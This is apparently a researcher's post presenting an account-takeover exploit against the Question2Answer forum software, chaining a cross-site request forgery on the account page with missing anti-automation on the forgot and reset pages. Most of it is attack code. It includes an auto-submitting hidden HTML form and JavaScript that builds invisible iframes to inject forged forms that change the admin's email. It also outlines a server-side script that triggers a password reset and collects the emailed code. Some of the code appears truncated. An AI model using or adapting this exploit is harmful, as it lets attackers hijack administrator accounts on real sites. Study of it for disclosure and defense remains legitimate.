Here is exploit for stealing admin's account in Question2Answer. This exploit uses Cross-Site Request Forgery vulnerability at http://site/account and Insufficient Anti-automation vulnerabilities at http://site/forgot and http://site/reset, which I've described in the second advisory about Question2Answer (
It will work in all affected versions of Question2Answer (and second part of the attack will work at default settings). If the admin of the target site has changed default settings and setup captcha at http://site/forgot, then server-side part of the attack can be done manually after conducting CSRF attack.
Client-side part of exploit do the next (code provided bellow):
1. Changes e-mail of the user or admin via CSRF.
2. Start server-side part of exploit via request to attack.php.
Server-side part of exploit (attack.php) do the next (algorithm):
After receiving the signal from client-side part of exploit, attack.php do the next:
1. Send POST request to http://site/forgot:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/forgot" method="post">
<input type="hidden" name="emailhandle" value="">
<input type="hidden" name="doforgot" value="1">
2. Check mailbox for letter with the code:
Code: 4f84yl1d
This line contains code for resetting password.
3. Send GET request to http://site/reset with this code:
4. New password is sent to attacker's e-mail.
Code of client-side exploit for stealing admin's account in Question2Answer:
<body onLoad="StartCSRF()">
function StartCSRF() {
for (var i=1;i<=2;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute('name', 'csrf'+i);
ifr.setAttribute('width', '0');
ifr.setAttribute('height', '0');
function CSRF1() {
window.frames["csrf1"].document.body.innerHTML = '<form name="hack" action="http://site/account" method="post">\n<input type="hidden" name="handle" value="test">\n<input type="hidden" name="email" value="">\n<input type="hidden" name="messages" value="1">\n<input type="hidden" name="mailings" value="1">\n<input type="hidden" name="field_1" value="test">\n<input type="hidden" name="field_2" value="test">\n<input type="hidden" name="field_3" value="test">\n<input type="hidden" name="dosaveprofile" value="1">\n</form>';
function CSRF2() {
window.frames["csrf2"].document.body.innerHTML = '<form name="hack" action="" method="post">\n<input type="hidden" name="do" value="1">\n</form>';